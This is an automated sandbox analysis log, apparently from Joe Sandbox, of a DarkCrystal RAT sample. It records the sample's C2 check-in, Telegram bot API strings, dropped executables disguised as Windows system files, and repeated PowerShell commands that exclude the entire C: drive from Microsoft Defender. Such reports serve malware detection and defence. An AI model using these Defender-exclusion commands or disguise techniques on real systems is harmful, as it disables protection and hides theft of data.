                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49703 -> 80.211.144.156:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49710 -> 34.117.59.81:443
                          Source: powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000025.00000002.1646778992.0000020000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E122A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA55A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5EB35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A94320A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B32F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EE28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B3F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF370B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1443899131.0000000003604000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1646778992.0000020000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E12081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA557A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A942F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B30D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF36E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D00A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000025.00000002.1646778992.0000020000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E122A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA55A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5EB35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A94320A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B32F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EE28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B3F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF370B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 00000025.00000002.1646778992.0000020000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E12081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA557A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A942F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B30D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF36E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D00A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmp, WJYLrfNX.log.0.drString found in binary or memory: https://api.telegram.org/bot
                          Source: powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmp, WJYLrfNX.log.0.drString found in binary or memory: https://ipinfo.io/country
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmp, WJYLrfNX.log.0.drString found in binary or memory: https://ipinfo.io/ip
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe\:Zone.Identifier:$DATAJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Windows\en-US\3fcc2d96fa9fd9Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMPJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMPJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeCode function: 0_2_00007FFAACB20D780_2_00007FFAACB20D78
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeCode function: 0_2_00007FFAACF1954F0_2_00007FFAACF1954F
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\HnmxfGsC.log 7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000000.1239602350.0000000000C4E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 0000004A.00000002.2281286314.0000000002841000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: XrtbrRarCSNElLBNKqySVVhxSZIi.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: XrtbrRarCSNElLBNKqySVVhxSZIi.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: RuntimeBroker.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: XrtbrRarCSNElLBNKqySVVhxSZIi.exe1.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, VvXTarJl0ChOXIqKcvs.csCryptographic APIs: 'CreateDecryptor'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, VvXTarJl0ChOXIqKcvs.csCryptographic APIs: 'CreateDecryptor'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, VvXTarJl0ChOXIqKcvs.csCryptographic APIs: 'CreateDecryptor'
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, VvXTarJl0ChOXIqKcvs.csCryptographic APIs: 'CreateDecryptor'
                          Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@79/114@0/0
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exeJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\Desktop\ynMPgItS.logJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-NncqUjpY8lJtlqP3j9oF
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8520:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile created: C:\Users\user\AppData\Local\Temp\0sp3gwcwJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat"
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeReversingLabs: Detection: 63%
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeFile read: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline"
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                          Source: unknownProcess created: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP"
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline"
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B99.tmp" "c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP"
                          Source: unknownProcess created: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                          Source: unknownProcess created: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe'
                          Source: C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
